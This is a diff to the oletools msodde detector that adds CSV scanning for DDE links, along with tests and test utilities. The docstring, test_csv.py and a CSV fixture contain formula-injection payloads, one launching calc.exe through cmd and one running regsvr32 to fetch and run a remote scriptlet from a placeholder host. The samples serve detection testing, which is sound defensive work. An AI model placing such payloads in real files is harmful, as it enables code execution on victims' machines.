| 593 | 613 | if elem.attrib[ATTR_W_FLDCHARTYPE] == "begin": |
| 594 | - level += 1 | |
| 614 | + level += 1 | |
| 595 | 615 | if elem.attrib[ATTR_W_FLDCHARTYPE] == "end": |
| 596 | 616 | level -= 1 |
| 597 | - if level == 0 or level == -1 : # edge-case where level becomes -1 | |
| 617 | + if level == 0 or level == -1: # edge-case; level becomes -1 | |
| 598 | 618 | fields.append(ddetext) |
| 599 | 619 | ddetext = u'' |
| 600 | - level = 0 # reset edge-case | |
| 601 | - | |
| 620 | + level = 0 # reset edge-case | |
| 621 | + | |
| 602 | 622 | # concatenate the text of the field, if present: |
| 603 | 623 | if elem.tag == TAG_W_INSTRTEXT and elem.text is not None: |
| 604 | - #expand field code if QUOTED | |
| 624 | + # expand field code if QUOTED | |
| 605 | 625 | ddetext += unquote(elem.text) |
| 606 | 626 | |
| 607 | 627 | for elem in root.iter(TAG_W_FLDSIMPLE): |
| ... | ... | @@ -611,25 +631,28 @@ def process_xml(data): |
| 611 | 631 | |
| 612 | 632 | return fields |
| 613 | 633 | |
| 614 | -def unquote(field): | |
| 634 | + | |
| 635 | +def unquote(field): | |
| 615 | 636 | if "QUOTE" not in field or NO_QUOTES: |
| 616 | 637 | return field |
| 617 | - #split into components | |
| 638 | + # split into components | |
| 618 | 639 | parts = field.strip().split(" ") |
| 619 | 640 | ddestr = "" |
| 620 | - for p in parts[1:]: | |
| 621 | - try: | |
| 622 | - ch = chr(int(p)) | |
| 641 | + for part in parts[1:]: | |
| 642 | + try: | |
| 643 | + character = chr(int(part)) | |
| 623 | 644 | except ValueError: |
| 624 | - ch = p | |
| 625 | - ddestr += ch | |
| 645 | + character = part | |
| 646 | + ddestr += character | |
| 626 | 647 | return ddestr |
| 627 | 648 | |
| 649 | + | |
| 628 | 650 | # "static variables" for field_is_blacklisted: |
| 629 | 651 | FIELD_WORD_REGEX = re.compile(r'"[^"]*"|\S+') |
| 630 | 652 | FIELD_BLACKLIST_CMDS = tuple(field[0].lower() for field in FIELD_BLACKLIST) |
| 631 | 653 | FIELD_SWITCH_REGEX = re.compile(r'^\\[\w#*@]$') |
| 632 | 654 | |
| 655 | + | |
| 633 | 656 | def field_is_blacklisted(contents): |
| 634 | 657 | """ Check if given field contents matches any in FIELD_BLACKLIST |
| 635 | 658 | |
| ... | ... | @@ -651,7 +674,7 @@ def field_is_blacklisted(contents): |
| 651 | 674 | index = FIELD_BLACKLIST_CMDS.index(words[0].lower()) |
| 652 | 675 | except ValueError: # first word is no blacklisted command |
| 653 | 676 | return False |
| 654 | - log.debug('trying to match "{0}" to blacklist command {0}' | |
| 677 | + log.debug('trying to match "{0}" to blacklist command {1}' | |
| 655 | 678 | .format(contents, FIELD_BLACKLIST[index])) |
| 656 | 679 | _, nargs_required, nargs_optional, sw_with_arg, sw_solo, sw_format \ |
| 657 | 680 | = FIELD_BLACKLIST[index] |
| ... | ... | @@ -706,14 +729,15 @@ def field_is_blacklisted(contents): |
| 706 | 729 | if 'numeric' in sw_format: |
| 707 | 730 | arg_choices = [] # too many choices to list them here |
| 708 | 731 | else: |
| 709 | - log.debug('unexpected switch {0} in "{1}"'.format(switch, contents)) | |
| 732 | + log.debug('unexpected switch {0} in "{1}"' | |
| 733 | + .format(switch, contents)) | |
| 710 | 734 | return False |
| 711 | 735 | |
| 712 | 736 | # if nothing went wrong sofar, the contents seems to match the blacklist |
| 713 | 737 | return True |
| 714 | 738 | |
| 715 | 739 | |
| 716 | -def process_xlsx(filepath, filed_filter_mode=None): | |
| 740 | +def process_xlsx(filepath): | |
| 717 | 741 | """ process an OOXML excel file (e.g. .xlsx or .xlsb or .xlsm) """ |
| 718 | 742 | dde_links = [] |
| 719 | 743 | parser = ooxml.XmlParser(filepath) |
| ... | ... | @@ -733,7 +757,8 @@ def process_xlsx(filepath, filed_filter_mode=None): |
| 733 | 757 | try: |
| 734 | 758 | logging.info('Parsing non-xml subfile {0} with content type {1}' |
| 735 | 759 | .format(subfile, content_type)) |
| 736 | - for record in xls_parser.parse_xlsb_part(handle, content_type, subfile): | |
| 760 | + for record in xls_parser.parse_xlsb_part(handle, content_type, | |
| 761 | + subfile): | |
| 737 | 762 | logging.debug('{0}: {1}'.format(subfile, record)) |
| 738 | 763 | if isinstance(record, xls_parser.XlsbBeginSupBook) and \ |
| 739 | 764 | record.link_type == \ |
| ... | ... | @@ -791,8 +816,9 @@ class RtfFieldParser(rtfobj.RtfParser): |
| 791 | 816 | |
| 792 | 817 | RTF_START = b'\x7b\x5c\x72\x74' # == b'{\rt' but does not mess up auto-indent |
| 793 | 818 | |
| 819 | + | |
| 794 | 820 | def process_rtf(file_handle, field_filter_mode=None): |
| 795 | - log.debug('process_rtf') | |
| 821 | + """ find dde links or other fields in rtf file """ | |
| 796 | 822 | all_fields = [] |
| 797 | 823 | data = RTF_START + file_handle.read() # read complete file into memory! |
| 798 | 824 | file_handle.close() |
| ... | ... | @@ -818,35 +844,119 @@ def process_rtf(file_handle, field_filter_mode=None): |
| 818 | 844 | return u'\n'.join(clean_fields) |
| 819 | 845 | |
| 820 | 846 | |
| 847 | +# threshold when to consider a csv file "small"; also used as sniffing size | |
| 848 | +CSV_SMALL_THRESH = 1024 | |
| 849 | + | |
| 850 | +# format of dde link: program-name | arguments ! unimportant | |
| 851 | +CSV_DDE_FORMAT = re.compile(r'\s*=(.+)\|(.+)!(.*)\s*') | |
| 852 | + | |
| 853 | +# allowed delimiters (python sniffer would use nearly any char). Taken from | |
| 854 | +# https://data-gov.tw.rpi.edu/wiki/CSV_files_use_delimiters_other_than_commas | |
| 855 | +CSV_DELIMITERS = ',\t ;|^' | |
| 856 | + | |
| 857 | + | |
| 858 | +def process_csv(filepath): | |
| 859 | + """ find dde in csv text | |
| 860 | + | |
| 861 | + finds text parts like =cmd|'/k ..\\..\\..\\Windows\\System32\\calc.exe'! or | |
| 862 | + =MSEXCEL|'\\..\\..\\..\\Windows\\System32\\regsvr32 [...] | |
| 863 | + | |
| 864 | + Hoping here that the :py:class:`csv.Sniffer` determines quote and delimiter | |
| 865 | + chars the same way that Excel does. Tested to some extent in unittests. |
| 866 | + | |
| 867 | + This can only find DDE-links, no other "suspicious" constructs (yet). | |
| 868 | + """ | |
| 869 | + | |
| 870 | + results = [] | |
| 871 | + with open(filepath, 'r') as file_handle: | |
| 872 | + results, dialect = process_csv_dialect(file_handle, CSV_DELIMITERS) | |
| 873 | + is_small = file_handle.tell() < CSV_SMALL_THRESH | |
| 874 | + | |
| 875 | + if is_small and not results: | |
| 876 | + # easy to mis-sniff small files. Try different delimiters | |
| 877 | + log.debug('small file, no results; try all delimiters') | |
| 878 | + file_handle.seek(0) | |
| 879 | + other_delim = CSV_DELIMITERS.replace(dialect.delimiter, '') | |
| 880 | + for delim in other_delim: | |
| 881 | + try: | |
| 882 | + file_handle.seek(0) | |
| 883 | + results, _ = process_csv_dialect(file_handle, delim) | |
| 884 | + except csv.Error: # e.g. sniffing fails | |
| 885 | + log.debug('failed to csv-parse with delimiter {0!r}' | |
| 886 | + .format(delim)) | |
| 887 | + | |
| 888 | + if is_small and not results: | |
| 889 | + # try whole file as single cell, since sniffing fails in this case | |
| 890 | + log.debug('last attempt: take whole file as single unquoted cell') | |
| 891 | + file_handle.seek(0) | |
| 892 | + match = CSV_DDE_FORMAT.match(file_handle.read(CSV_SMALL_THRESH)) | |
| 893 | + if match: | |
| 894 | + results.append(u' '.join(match.groups()[:2])) | |
| 895 | + | |
| 896 | + return u'\n'.join(results) | |
| 897 | + | |
| 898 | + | |
| 899 | +def process_csv_dialect(file_handle, delimiters): | |
| 900 | + """ helper for process_csv: process with a specific csv dialect """ | |
| 901 | + | |
| 902 | + # determine dialect = delimiter chars, quote chars, ... | |
| 903 | + dialect = csv.Sniffer().sniff(file_handle.read(CSV_SMALL_THRESH), | |
| 904 | + delimiters=delimiters) | |
| 905 | + dialect.strict = False # microsoft is never strict | |
| 906 | + log.debug('sniffed csv dialect with delimiter {0!r} ' | |
| 907 | + 'and quote char {1!r}' | |
| 908 | + .format(dialect.delimiter, dialect.quotechar)) | |
| 909 | + | |
| 910 | + # rewind file handle to start | |
| 911 | + file_handle.seek(0) | |
| 912 | + | |
| 913 | + # loop over all csv rows and columns | |
| 914 | + results = [] | |
| 915 | + reader = csv.reader(file_handle, dialect) | |
| 916 | + for row in reader: | |
| 917 | + for cell in row: | |
| 918 | + # check if cell matches | |
| 919 | + match = CSV_DDE_FORMAT.match(cell) | |
| 920 | + if match: | |
| 921 | + results.append(u' '.join(match.groups()[:2])) | |
| 922 | + return results, dialect | |
| 923 | + | |
| 924 | + | |
| 821 | 925 | def process_file(filepath, field_filter_mode=None): |
| 822 | - """ decides which of process_doc/x or process_xls/x to call """ | |
| 926 | + """ decides which of the process_* functions to call """ | |
| 823 | 927 | if olefile.isOleFile(filepath): |
| 824 | - log.debug('checking streams to see whether this is xls') | |
| 928 | + log.debug('Is OLE. Checking streams to see whether this is xls') | |
| 825 | 929 | if xls_parser.is_xls(filepath): |
| 930 | + log.debug('Process file as excel 2003 (xls)') | |
| 826 | 931 | return process_xls(filepath) |
| 827 | 932 | else: |
| 933 | + log.debug('Process file as word 2003 (doc)') | |
| 828 | 934 | return process_doc(filepath) |
| 829 | 935 | |
| 830 | 936 | with open(filepath, 'rb') as file_handle: |
| 831 | - if file_handle.read(4) == RTF_START: | |
| 832 | - # This is a RTF file | |
| 937 | + if file_handle.read(4) == RTF_START: | |
| 938 | + log.debug('Process file as rtf') | |
| 833 | 939 | return process_rtf(file_handle, field_filter_mode) |
| 834 | 940 | |
| 835 | 941 | try: |
| 836 | 942 | doctype = ooxml.get_type(filepath) |
| 837 | - except Exception: | |
| 838 | - log.debug('Exception trying to xml-parse file', exc_info=True) | |
| 943 | + log.debug('Detected file type: {0}'.format(doctype)) | |
| 944 | + except Exception as exc: | |
| 945 | + log.debug('Exception trying to xml-parse file: {0}'.format(exc)) | |
| 839 | 946 | doctype = None |
| 840 | 947 | |
| 841 | - if doctype: | |
| 842 | - log.debug('Detected file type: {0}'.format(doctype)) | |
| 843 | 948 | if doctype == ooxml.DOCTYPE_EXCEL: |
| 844 | - return process_xlsx(filepath, field_filter_mode) | |
| 845 | - else: | |
| 949 | + log.debug('Process file as excel 2007+ (xlsx)') | |
| 950 | + return process_xlsx(filepath) | |
| 951 | + elif doctype is None: | |
| 952 | + log.debug('Process file as csv') | |
| 953 | + return process_csv(filepath) | |
| 954 | + else: # could be docx; if not: this is the old default code path | |
| 955 | + log.debug('Process file as word 2007+ (docx)') | |
| 846 | 956 | return process_docx(filepath, field_filter_mode) |
| 847 | 957 | |
| 848 | 958 | |
| 849 | -#=== MAIN ================================================================= | |
| 959 | +# === MAIN ================================================================= | |
| 850 | 960 | |
| 851 | 961 | def main(cmd_line_args=None): |
| 852 | 962 | """ Main function, called if this file is called as a script |
| ... | ... | @@ -868,10 +978,10 @@ def main(cmd_line_args=None): |
| 868 | 978 | if args.json and args.loglevel.lower() == 'debug': |
| 869 | 979 | log.warning('Debug log output will not be json-compatible!') |
| 870 | 980 | |
| 871 | - if args.nounquote : | |
| 981 | + if args.nounquote: | |
| 872 | 982 | global NO_QUOTES |
| 873 | 983 | NO_QUOTES = True |
| 874 | - | |
| 984 | + | |
| 875 | 985 | if args.json: |
| 876 | 986 | jout = [] |
| 877 | 987 | jout.append(BANNER_JSON) |
| ... | ... | @@ -890,7 +1000,7 @@ def main(cmd_line_args=None): |
| 890 | 1000 | except Exception as exc: |
| 891 | 1001 | if args.json: |
| 892 | 1002 | jout.append(dict(type='error', error=type(exc).__name__, |
| 893 | - message=str(exc))) # strange: str(exc) is enclosed in "" | |
| 1003 | + message=str(exc))) | |
| 894 | 1004 | else: |
| 895 | 1005 | raise # re-raise last known exception, keeping trace intact |
| 896 | 1006 | ... | ... |
tests/msodde/test_basic.py
| ... | ... | @@ -17,11 +17,13 @@ from traceback import print_exc |
| 17 | 17 | |
| 18 | 18 | |
| 19 | 19 | class TestReturnCode(unittest.TestCase): |
| 20 | + """ check return codes and exception behaviour (not text output) """ | |
| 20 | 21 | |
| 21 | 22 | def test_valid_doc(self): |
| 22 | 23 | """ check that a valid doc file leads to 0 exit status """ |
| 23 | - for filename in ('dde-test-from-office2003', 'dde-test-from-office2016', | |
| 24 | - 'harmless-clean', 'dde-test-from-office2013-utf_16le-korean'): | |
| 24 | + for filename in ( | |
| 25 | + 'dde-test-from-office2003', 'dde-test-from-office2016', | |
| 26 | + 'harmless-clean', 'dde-test-from-office2013-utf_16le-korean'): | |
| 25 | 27 | self.do_test_validity(join(BASE_DIR, 'msodde', |
| 26 | 28 | filename + '.doc')) |
| 27 | 29 | |
| ... | ... | @@ -65,9 +67,9 @@ class TestReturnCode(unittest.TestCase): |
| 65 | 67 | except Exception: |
| 66 | 68 | have_exception = True |
| 67 | 69 | print_exc() |
| 68 | - except SystemExit as se: # sys.exit() was called | |
| 69 | - return_code = se.code | |
| 70 | - if se.code is None: | |
| 70 | + except SystemExit as exc: # sys.exit() was called | |
| 71 | + return_code = exc.code | |
| 72 | + if exc.code is None: | |
| 71 | 73 | return_code = 0 |
| 72 | 74 | |
| 73 | 75 | self.assertEqual(expect_error, have_exception or (return_code != 0), |
| ... | ... | @@ -77,9 +79,13 @@ class TestReturnCode(unittest.TestCase): |
| 77 | 79 | |
| 78 | 80 | |
| 79 | 81 | class TestDdeLinks(unittest.TestCase): |
| 82 | + """ capture output of msodde and check dde-links are found correctly """ | |
| 80 | 83 | |
| 81 | 84 | def get_dde_from_output(self, capturer): |
| 82 | - """ helper to read dde links from captured output """ | |
| 85 | + """ helper to read dde links from captured output | |
| 86 | + | |
| 87 | + duplicate in tests/msodde/test_csv | |
| 88 | + """ | |
| 83 | 89 | have_start_line = False |
| 84 | 90 | result = [] |
| 85 | 91 | for line in capturer: |
| ... | ... | @@ -90,7 +96,7 @@ class TestDdeLinks(unittest.TestCase): |
| 90 | 96 | elif line == 'DDE Links:': |
| 91 | 97 | have_start_line = True |
| 92 | 98 | |
| 93 | - self.assertTrue(have_start_line) # ensure output was complete | |
| 99 | + self.assertTrue(have_start_line) # ensure output was complete | |
| 94 | 100 | return result |
| 95 | 101 | |
| 96 | 102 | def test_with_dde(self): | ... | ... |
tests/msodde/test_blacklist.py
| ... | ... | @@ -39,8 +39,8 @@ EXAMPLES_MATCH = ( |
| 39 | 39 | r'ADVANCE \x 150', |
| 40 | 40 | r'AUTHOR', |
| 41 | 41 | r'AUTHOR "Tony Caruso"', |
| 42 | - r'BIBLIOGRAPHY \l 1033', # note: the original example has "/l 1033" | |
| 43 | - r'CITATION Ecma01 \l 1033', # note: this also. Hope this is just a typo | |
| 42 | + r'BIBLIOGRAPHY \l 1033', # note: the original example has "/l 1033" | |
| 43 | + r'CITATION Ecma01 \l 1033', # note: this also. Hope this is just a typo | |
| 44 | 44 | r'COMMENTS', |
| 45 | 45 | r'COMMENTS "I came, I saw, I was not impressed."', |
| 46 | 46 | r'CREATEDATE', |
| ... | ... | @@ -228,6 +228,7 @@ EXAMPLES_NOMATCH = ( |
| 228 | 228 | r'SKIPIF MERGEFIELD Order < 100', |
| 229 | 229 | ) |
| 230 | 230 | |
| 231 | + | |
| 231 | 232 | class TestBlacklist(unittest.TestCase): |
| 232 | 233 | """ Tests msodde blacklist feature """ |
| 233 | 234 | ... | ... |
tests/msodde/test_csv.py
0 → 100644
| 1 | +#!/usr/bin/env python3 | |
| 2 | + | |
| 3 | + | |
| 4 | +""" Check various csv examples """ | |
| 5 | + | |
| 6 | +import unittest | |
| 7 | +from tempfile import mkstemp | |
| 8 | +import os | |
| 9 | +from os.path import join | |
| 10 | + | |
| 11 | +from oletools import msodde | |
| 12 | +from tests.test_utils import OutputCapture, DATA_BASE_DIR | |
| 13 | + | |
| 14 | + | |
| 15 | +class TestCSV(unittest.TestCase): | |
| 16 | + """ Check various csv examples """ | |
| 17 | + | |
| 18 | + DO_DEBUG = False | |
| 19 | + | |
| 20 | + def test_texts(self): | |
| 21 | + """ write some sample texts to file, run those """ | |
| 22 | + SAMPLES = ( | |
| 23 | + "=cmd|'/k ..\\..\\..\\Windows\\System32\\calc.exe'!''", | |
| 24 | + "=MSEXCEL|'\\..\\..\\..\\Windows\\System32\\regsvr32 /s /n /u " + | |
| 25 | + "/i:http://RemoteIPAddress/SCTLauncher.sct scrobj.dll'!''", | |
| 26 | + "completely innocent text" | |
| 27 | + ) | |
| 28 | + | |
| 29 | + LONG_SAMPLE_FACTOR = 100 # make len(sample) > CSV_SMALL_THRESH | |
| 30 | + DELIMITERS = ',\t ;|^' | |
| 31 | + QUOTES = '', '"' # no ' since samples use those "internally" | |
| 32 | + PREFIXES = ('', '{quote}item-before{quote}{delim}', | |
| 33 | + '{quote}line{delim}before{quote}\n'*LONG_SAMPLE_FACTOR, | |
| 34 | + '{quote}line{delim}before{quote}\n'*LONG_SAMPLE_FACTOR + | |
| 35 | + '{quote}item-before{quote}{delim}') | |
| 36 | + SUFFIXES = ('', '{delim}{quote}item-after{quote}', | |
| 37 | + '\n{quote}line{delim}after{quote}'*LONG_SAMPLE_FACTOR, | |
| 38 | + '{delim}{quote}item-after{quote}' + | |
| 39 | + '\n{quote}line{delim}after{quote}'*LONG_SAMPLE_FACTOR) | |
| 40 | + | |
| 41 | + for sample_core in SAMPLES: | |
| 42 | + for prefix in PREFIXES: | |
| 43 | + for suffix in SUFFIXES: | |
| 44 | + for delim in DELIMITERS: | |
| 45 | + for quote in QUOTES: | |
| 46 | + # without quoting command is split at space or | | |
| 47 | + if quote == '' and delim in sample_core: | |
| 48 | + continue | |
| 49 | + | |
| 50 | + sample = \ | |
| 51 | + prefix.format(quote=quote, delim=delim) + \ | |
| 52 | + quote + sample_core + quote + \ | |
| 53 | + suffix.format(quote=quote, delim=delim) | |
| 54 | + output = self.write_and_run(sample) | |
| 55 | + n_links = len(self.get_dde_from_output(output)) | |
| 56 | + desc = 'sample with core={0!r}, prefix-len {1}, ' \ | |
| 57 | + 'suffix-len {2}, delim {3!r} and quote ' \ | |
| 58 | + '{4!r}'.format(sample_core, len(prefix), | |
| 59 | + len(suffix), delim, quote) | |
| 60 | + if 'innocent' in sample: | |
| 61 | + self.assertEqual(n_links, 0, 'found dde-link ' | |
| 62 | + 'in clean sample') | |
| 63 | + else: | |
| 64 | + msg = 'Failed to find dde-link in ' + desc | |
| 65 | + self.assertEqual(n_links, 1, msg) | |
| 66 | + if self.DO_DEBUG: | |
| 67 | + print('Worked: ' + desc) | |
| 68 | + | |
| 69 | + def test_file(self): | |
| 70 | + """ test simple small example file """ | |
| 71 | + filename = join(DATA_BASE_DIR, 'msodde', 'dde-in-csv.csv') | |
| 72 | + with OutputCapture() as capturer: | |
| 73 | + capturer.reload_module(msodde) # re-create logger | |
| 74 | + ret_code = msodde.main([filename, ]) | |
| 75 | + self.assertEqual(ret_code, 0) | |
| 76 | + links = self.get_dde_from_output(capturer) | |
| 77 | + self.assertEqual(len(links), 1) | |
| 78 | + self.assertEqual(links[0], | |
| 79 | + r"cmd '/k \..\..\..\Windows\System32\calc.exe'") | |
| 80 | + | |
| 81 | + def write_and_run(self, sample_text): | |
| 82 | + """ helper for test_texts: save text to file, run through msodde """ | |
| 83 | + filename = None | |
| 84 | + handle = 0 | |
| 85 | + try: | |
| 86 | + handle, filename = mkstemp(prefix='oletools-test-csv-', text=True) | |
| 87 | + os.write(handle, sample_text.encode('ascii')) | |
| 88 | + os.close(handle) | |
| 89 | + handle = 0 | |
| 90 | + args = [filename, ] | |
| 91 | + if self.DO_DEBUG: | |
| 92 | + args += ['-l', 'debug'] | |
| 93 | + | |
| 94 | + with OutputCapture() as capturer: | |
| 95 | + capturer.reload_module(msodde) # re-create logger | |
| 96 | + ret_code = msodde.main(args) | |
| 97 | + self.assertEqual(ret_code, 0, 'checking sample resulted in ' | |
| 98 | + 'error:\n' + sample_text) | |
| 99 | + return capturer | |
| 100 | + | |
| 101 | + except Exception: | |
| 102 | + raise | |
| 103 | + finally: | |
| 104 | + if handle: | |
| 105 | + os.close(handle) | |
| 106 | + handle = 0 # just in case | |
| 107 | + if filename: | |
| 108 | + if self.DO_DEBUG: | |
| 109 | + print('keeping for debug purposes: {0}'.format(filename)) | |
| 110 | + else: | |
| 111 | + os.remove(filename) | |
| 112 | + filename = None # just in case | |
| 113 | + | |
| 114 | + def get_dde_from_output(self, capturer): | |
| 115 | + """ helper to read dde links from captured output | |
| 116 | + | |
| 117 | + duplicate in tests/msodde/test_basic | |
| 118 | + """ | |
| 119 | + have_start_line = False | |
| 120 | + result = [] | |
| 121 | + for line in capturer: | |
| 122 | + if self.DO_DEBUG: | |
| 123 | + print('captured: ' + line) | |
| 124 | + if not line.strip(): | |
| 125 | + continue # skip empty lines | |
| 126 | + if have_start_line: | |
| 127 | + result.append(line) | |
| 128 | + elif line == 'DDE Links:': | |
| 129 | + have_start_line = True | |
| 130 | + | |
| 131 | + self.assertTrue(have_start_line) # ensure output was complete | |
| 132 | + return result | |
| 133 | + | |
| 134 | + | |
| 135 | +# just in case somebody calls this file as a script | |
| 136 | +if __name__ == '__main__': | |
| 137 | + unittest.main() | ... | ... |
tests/ooxml/test_basic.py
| ... | ... | @@ -12,24 +12,33 @@ from oletools import ooxml |
| 12 | 12 | class TestOOXML(unittest.TestCase): |
| 13 | 13 | """ Tests my cool new feature """ |
| 14 | 14 | |
| 15 | + DO_DEBUG = False | |
| 16 | + | |
| 15 | 17 | def test_all_rough(self): |
| 16 | 18 | """Checks all samples, expect either ole files or good ooxml output""" |
| 17 | 19 | acceptable = ooxml.DOCTYPE_EXCEL, ooxml.DOCTYPE_WORD, \ |
| 18 | 20 | ooxml.DOCTYPE_POWERPOINT |
| 21 | + | |
| 22 | + # files that are neither OLE nor xml: | |
| 19 | 23 | except_files = 'empty', 'text' |
| 20 | - except_extns = '.xml', '.rtf' | |
| 24 | + except_extns = '.xml', '.rtf', '.csv' | |
| 25 | + | |
| 26 | + # analyse all files in data dir | |
| 21 | 27 | for base_dir, _, files in os.walk(DATA_BASE_DIR): |
| 22 | 28 | for filename in files: |
| 23 | 29 | if filename in except_files: |
| 24 | - #print('skip file: ' + filename) | |
| 30 | + if self.DO_DEBUG: | |
| 31 | + print('skip file: ' + filename) | |
| 25 | 32 | continue |
| 26 | 33 | if splitext(filename)[1] in except_extns: |
| 27 | - #print('skip extn: ' + filename) | |
| 34 | + if self.DO_DEBUG: | |
| 35 | + print('skip extn: ' + filename) | |
| 28 | 36 | continue |
| 29 | 37 | |
| 30 | 38 | full_name = join(base_dir, filename) |
| 31 | 39 | if isOleFile(full_name): |
| 32 | - #print('skip ole: ' + filename) | |
| 40 | + if self.DO_DEBUG: | |
| 41 | + print('skip ole: ' + filename) | |
| 33 | 42 | continue |
| 34 | 43 | try: |
| 35 | 44 | doctype = ooxml.get_type(full_name) |
| ... | ... | @@ -38,7 +47,8 @@ class TestOOXML(unittest.TestCase): |
| 38 | 47 | self.assertTrue(doctype in acceptable, |
| 39 | 48 | msg='Doctype "{0}" for {1} not acceptable' |
| 40 | 49 | .format(doctype, full_name)) |
| 41 | - #print('ok: ' + filename + doctype) | |
| 50 | + if self.DO_DEBUG: | |
| 51 | + print('ok: {0} --> {1}'.format(filename, doctype)) | |
| 42 | 52 | |
| 43 | 53 | |
| 44 | 54 | # just in case somebody calls this file as a script | ... | ... |
tests/test-data/msodde/dde-in-csv.csv
0 → 100644
| 1 | +=cmd|'/k \..\..\..\Windows\System32\calc.exe'!A0 | ... | ... |
tests/test_utils/output_capture.py
| ... | ... | @@ -2,13 +2,20 @@ |
| 2 | 2 | |
| 3 | 3 | from __future__ import print_function |
| 4 | 4 | import sys |
| 5 | +import logging | |
| 5 | 6 | |
| 6 | 7 | |
| 7 | 8 | # python 2/3 version conflict: |
| 8 | 9 | if sys.version_info.major <= 2: |
| 9 | 10 | from StringIO import StringIO |
| 11 | + # reload is a builtin | |
| 10 | 12 | else: |
| 11 | 13 | from io import StringIO |
| 14 | + if sys.version_info.minor < 4: | |
| 15 | + from imp import reload | |
| 16 | + else: | |
| 17 | + from importlib import reload | |
| 18 | + | |
| 12 | 19 | |
| 13 | 20 | class OutputCapture: |
| 14 | 21 | """ context manager that captures stdout |
| ... | ... | @@ -24,6 +31,10 @@ class OutputCapture: |
| 24 | 31 | # ...or test all output in one go |
| 25 | 32 | some_test(capturer.get_data()) |
| 26 | 33 | |
| 34 | + In order to solve issues with old logger instances still remembering closed | |
| 35 | +StringIO instances as "their" stdout, logging is shut down and restarted |
| 36 | +upon entering this context manager. This means that you may have to reload |
| 37 | + your module, as well. | |
| 27 | 38 | """ |
| 28 | 39 | |
| 29 | 40 | def __init__(self): |
| ... | ... | @@ -32,6 +43,11 @@ class OutputCapture: |
| 32 | 43 | self.data = None |
| 33 | 44 | |
| 34 | 45 | def __enter__(self): |
| 46 | + # Avoid problems with old logger instances that still remember an old | |
| 47 | + # closed StringIO as their sys.stdout | |
| 48 | + logging.shutdown() | |
| 49 | + reload(logging) | |
| 50 | + | |
| 35 | 51 | # replace sys.stdout with own buffer. |
| 36 | 52 | self.orig_stdout = sys.stdout |
| 37 | 53 | sys.stdout = self.buffer |
| ... | ... | @@ -61,3 +77,7 @@ class OutputCapture: |
| 61 | 77 | def __iter__(self): |
| 62 | 78 | for line in self.get_data().splitlines(): |
| 63 | 79 | yield line |
| 80 | + | |
| 81 | + def reload_module(self, mod): | |
| 82 | + """ Wrapper around reload function for different python versions """ | |
| 83 | + return reload(mod) | ... | ... |